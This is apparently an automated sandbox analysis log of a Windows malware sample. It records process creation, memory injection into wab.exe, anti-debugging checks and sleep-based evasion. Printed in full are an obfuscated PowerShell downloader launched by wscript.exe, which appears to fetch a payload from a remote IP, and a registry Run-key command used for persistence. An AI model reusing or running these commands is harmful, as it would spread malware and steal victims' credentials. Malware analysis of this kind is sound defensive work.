Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 13_2_0040DD85
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5887 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3891 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6884 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2901 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 1670 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe API coverage: 9.3 %
Source: C:\Windows\System32\wscript.exe TID: 3384 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6884 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2004 Thread sleep count: 6884 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2996 Thread sleep count: 2901 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7176 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7704 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread sleep count: Count: 1670 delay: -5 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0040AE51 FindFirstFileW,FindNextFileW, 13_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 14_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 15_2_00407898
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00418981 memset,GetSystemInfo, 13_2_00418981
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 60000 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WCN\en-GB\ Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\ Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en\ Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Examples\ Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\ Jump to behavior
Source: wscript.exe, 00000000.00000003.1629983948.000001ABE8815000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1629744110.000001ABE8821000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1629275988.000001ABE881F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1748995993.000001ABE8814000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1746569290.000001ABE8814000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWpQ
Source: wscript.exe, 00000000.00000003.1747193609.000001ABE8893000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.1746224283.000001ABE6822000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: wscript.exe, 00000000.00000003.1630136990.000001ABE88B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1629028077.000001ABE88B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1746569290.000001ABE88B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1749058600.000001ABE88B3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000001.00000002.2627753604.000002B7C0971000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW&e%SystemRoot%\system32\mswsock.dll,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredvemRestpldStartk Borem./Exo ercAuturg reoler$slithJ~rIE;
Source: C:\Program Files (x86)\Windows Mail\wab.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00A4DAAC LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk, 5_2_00A4DAAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 13_2_0040DD85
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 13_2_004044A4

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 44C0000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 323F8FC Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt $Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0 Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/ esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals 'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4 ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredv Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\deklaration.Sup && echo $" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt $Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0 Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/ esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals 'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4 ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredv Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\deklaration.Sup && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\peqezcketotthbxautag" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\aywoauvyhwlgrptelemijrt" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\cajhaffzuedltvhiuphbmeobpae" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$nedskrivningstidspunkter = 1;$hotplate='s';$hotplate+='ubstrin';$hotplate+='g';function andelskapitals($hentningens){$stadsgartnerne167=$hentningens.length-$nedskrivningstidspunkter;for($perifere=6; $perifere -lt $stadsgartnerne167; $perifere+=(7)){$lungfishes+=$hentningens.$hotplate.invoke( $perifere, $nedskrivningstidspunkter);}$lungfishes;}function ordonnant($splatcher){& ($typechecke) ($splatcher);}$nonlover=andelskapitals ' sys.amg oundo hypopzhast.eimetacrlp,nktule,sekuaudfore/salva.5f.lked.sto.mh0bjerge slips (c llutwba aviiout,abnspearmdbasisaogustneweuryprs ,nsyn ,elaarncor ndtdec,nc ign,r1meadwo0insali.rygskk0.ceptr;,eutro camporwreveilibetalin co,pl6 shyes4bra in;tegn,f fjern,xammoni6ch.ysa4 ps ud;chemeh trichor befrdvtrilli:degend1archse2r mmea1shrimp.macada0 smrke)no loc riddergtreskieuhjt,dc paasykskurveounp in/introd2sulted0h.hcer1 fiks.0missan0 ulpko1elect,0 uds,i1her.is lager.fantiprisams.er dunfie varimfsndrerouninvexbroder/fleece1ste ku2fonot,1frigin.oblige0au ifo ';$staser112=andelskapitals 'l.gestupostkasalkohoe.nlaidr rero-ka.ensagaldesge.dosaeunsof ncou.tet garvn ';$tamari=andelskapitals ' wic,ihskridttflisebtflinkeprelaks:spis k/cablem/ esews8c.efsa7drame,. ubehv1startl2 dishi1 march. nrum1 unbed0aarlig5g psba.pr.duk1opteg 8 oplys4periv,/neoclaud,tabedomnifavkas,ageco.logjretshanwhatsiialvildno,gaveg cleweecowgirrskriv,npensioe miracs me.pa.spinulabovrupaforsknfdi.ndr ';$unhesitatively=andelskapitals ' julea>rhizop ';$typechecke=andelskapitals 'orfedeishyessebesrgex fr.tt ';$boblegummiets142='flyverdragterne';ordonnant (andelskapitals 'plast.scancane sociat udraa-wa,tebcatavisorek.rsndiskoft ild,letransvngu.deltrelosi dok,me-sla,gepouttroab.kebitnowtschsam.en indtjtkalibr:torlek\titre,hprolepasmokehnvand.ok idio nmexicasbek ftv dibensrokkesntjreple abstrt ocamascharla3myelof4aargan.photo t pickaxulydigt,ormon swith-gutturvcalo,iavoltenl khaf uga biee a,tim ortjn$mcnaugbc.llefo nthrbsksforltoldfoekommutgobligauthuggemspaltemsonnibilappedetinta.t attessam.est1noncoo4 ecidi2cariam;capafa ');ordonnant (andelskapitals ',ostvsiomfo.mftiaars change(tm erftlakkedehasenss tuvalta,vask- ascenp tes,uaapriortacronyhgylden ritont minim:bund l\k.pitahalvarsa te.ron g,netksticklnhol,afs gurnav nvades .redin speciedammust rottesklassi3sgneda4 serie.fi.klvtrhinanxbreasttmultim)sp,uci{ministe br.dexgrundvindringt sprog}doreth;r.cipr ');$nonenvious = andelskapitals 'mistnke spec,ct,avelhhypo,tono enc komple%ov rheasmdenapcorpsmpskurend midjeaeuectit efterabroade%ejidos\ko.roidlitmusepathanktolvaalsh rtealaithrr umisfa spisett ansmi wormroentwinnconsec. ashisurinseujea.sepoccide vesteu&nuppe.&extra hankneskurvoc.ulmothsatayfostat,s iste$kolle. ';ordonnant (andelskapitals 'matri,$plovfug,arbgel kleptoroligebmortada,etteflbienni:cyanocb erminamingelak,rkebsm.skinkrede,iapigmenpsnilde=vandre( trewctredv
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$nedskrivningstidspunkter = 1;$hotplate='s';$hotplate+='ubstrin';$hotplate+='g';function andelskapitals($hentningens){$stadsgartnerne167=$hentningens.length-$nedskrivningstidspunkter;for($perifere=6; $perifere -lt $stadsgartnerne167; $perifere+=(7)){$lungfishes+=$hentningens.$hotplate.invoke( $perifere, $nedskrivningstidspunkter);}$lungfishes;}function ordonnant($splatcher){& ($typechecke) ($splatcher);}$nonlover=andelskapitals ' sys.amg oundo hypopzhast.eimetacrlp,nktule,sekuaudfore/salva.5f.lked.sto.mh0bjerge slips (c llutwba aviiout,abnspearmdbasisaogustneweuryprs ,nsyn ,elaarncor ndtdec,nc ign,r1meadwo0insali.rygskk0.ceptr;,eutro camporwreveilibetalin co,pl6 shyes4bra in;tegn,f fjern,xammoni6ch.ysa4 ps ud;chemeh trichor befrdvtrilli:degend1archse2r mmea1shrimp.macada0 smrke)no loc riddergtreskieuhjt,dc paasykskurveounp in/introd2sulted0h.hcer1 fiks.0missan0 ulpko1elect,0 uds,i1her.is lager.fantiprisams.er dunfie varimfsndrerouninvexbroder/fleece1ste ku2fonot,1frigin.oblige0au ifo ';$staser112=andelskapitals 'l.gestupostkasalkohoe.nlaidr rero-ka.ensagaldesge.dosaeunsof ncou.tet garvn ';$tamari=andelskapitals ' wic,ihskridttflisebtflinkeprelaks:spis k/cablem/ esews8c.efsa7drame,. ubehv1startl2 dishi1 march. nrum1 unbed0aarlig5g psba.pr.duk1opteg 8 oplys4periv,/neoclaud,tabedomnifavkas,ageco.logjretshanwhatsiialvildno,gaveg cleweecowgirrskriv,npensioe miracs me.pa.spinulabovrupaforsknfdi.ndr ';$unhesitatively=andelskapitals ' julea>rhizop ';$typechecke=andelskapitals 'orfedeishyessebesrgex fr.tt ';$boblegummiets142='flyverdragterne';ordonnant (andelskapitals 'plast.scancane sociat udraa-wa,tebcatavisorek.rsndiskoft ild,letransvngu.deltrelosi dok,me-sla,gepouttroab.kebitnowtschsam.en indtjtkalibr:torlek\titre,hprolepasmokehnvand.ok idio nmexicasbek ftv dibensrokkesntjreple abstrt ocamascharla3myelof4aargan.photo t pickaxulydigt,ormon swith-gutturvcalo,iavoltenl khaf uga biee a,tim ortjn$mcnaugbc.llefo nthrbsksforltoldfoekommutgobligauthuggemspaltemsonnibilappedetinta.t attessam.est1noncoo4 ecidi2cariam;capafa ');ordonnant (andelskapitals ',ostvsiomfo.mftiaars change(tm erftlakkedehasenss tuvalta,vask- ascenp tes,uaapriortacronyhgylden ritont minim:bund l\k.pitahalvarsa te.ron g,netksticklnhol,afs gurnav nvades .redin speciedammust rottesklassi3sgneda4 serie.fi.klvtrhinanxbreasttmultim)sp,uci{ministe br.dexgrundvindringt sprog}doreth;r.cipr ');$nonenvious = andelskapitals 'mistnke spec,ct,avelhhypo,tono enc komple%ov rheasmdenapcorpsmpskurend midjeaeuectit efterabroade%ejidos\ko.roidlitmusepathanktolvaalsh rtealaithrr umisfa spisett ansmi wormroentwinnconsec. ashisurinseujea.sepoccide vesteu&nuppe.&extra hankneskurvoc.ulmothsatayfostat,s iste$kolle. ';ordonnant (andelskapitals 'matri,$plovfug,arbgel kleptoroligebmortada,etteflbienni:cyanocb erminamingelak,rkebsm.skinkrede,iapigmenpsnilde=vandre( trewctredv
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$nedskrivningstidspunkter = 1;$hotplate='s';$hotplate+='ubstrin';$hotplate+='g';function andelskapitals($hentningens){$stadsgartnerne167=$hentningens.length-$nedskrivningstidspunkter;for($perifere=6; $perifere -lt $stadsgartnerne167; $perifere+=(7)){$lungfishes+=$hentningens.$hotplate.invoke( $perifere, $nedskrivningstidspunkter);}$lungfishes;}function ordonnant($splatcher){& ($typechecke) ($splatcher);}$nonlover=andelskapitals ' sys.amg oundo hypopzhast.eimetacrlp,nktule,sekuaudfore/salva.5f.lked.sto.mh0bjerge slips (c llutwba aviiout,abnspearmdbasisaogustneweuryprs ,nsyn ,elaarncor ndtdec,nc ign,r1meadwo0insali.rygskk0.ceptr;,eutro camporwreveilibetalin co,pl6 shyes4bra in;tegn,f fjern,xammoni6ch.ysa4 ps ud;chemeh trichor befrdvtrilli:degend1archse2r mmea1shrimp.macada0 smrke)no loc riddergtreskieuhjt,dc paasykskurveounp in/introd2sulted0h.hcer1 fiks.0missan0 ulpko1elect,0 uds,i1her.is lager.fantiprisams.er dunfie varimfsndrerouninvexbroder/fleece1ste ku2fonot,1frigin.oblige0au ifo ';$staser112=andelskapitals 'l.gestupostkasalkohoe.nlaidr rero-ka.ensagaldesge.dosaeunsof ncou.tet garvn ';$tamari=andelskapitals ' wic,ihskridttflisebtflinkeprelaks:spis k/cablem/ esews8c.efsa7drame,. ubehv1startl2 dishi1 march. nrum1 unbed0aarlig5g psba.pr.duk1opteg 8 oplys4periv,/neoclaud,tabedomnifavkas,ageco.logjretshanwhatsiialvildno,gaveg cleweecowgirrskriv,npensioe miracs me.pa.spinulabovrupaforsknfdi.ndr ';$unhesitatively=andelskapitals ' julea>rhizop ';$typechecke=andelskapitals 'orfedeishyessebesrgex fr.tt ';$boblegummiets142='flyverdragterne';ordonnant (andelskapitals 'plast.scancane sociat udraa-wa,tebcatavisorek.rsndiskoft ild,letransvngu.deltrelosi dok,me-sla,gepouttroab.kebitnowtschsam.en indtjtkalibr:torlek\titre,hprolepasmokehnvand.ok idio nmexicasbek ftv dibensrokkesntjreple abstrt ocamascharla3myelof4aargan.photo t pickaxulydigt,ormon swith-gutturvcalo,iavoltenl khaf uga biee a,tim ortjn$mcnaugbc.llefo nthrbsksforltoldfoekommutgobligauthuggemspaltemsonnibilappedetinta.t attessam.est1noncoo4 ecidi2cariam;capafa ');ordonnant (andelskapitals ',ostvsiomfo.mftiaars change(tm erftlakkedehasenss tuvalta,vask- ascenp tes,uaapriortacronyhgylden ritont minim:bund l\k.pitahalvarsa te.ron g,netksticklnhol,afs gurnav nvades .redin speciedammust rottesklassi3sgneda4 serie.fi.klvtrhinanxbreasttmultim)sp,uci{ministe br.dexgrundvindringt sprog}doreth;r.cipr ');$nonenvious = andelskapitals 'mistnke 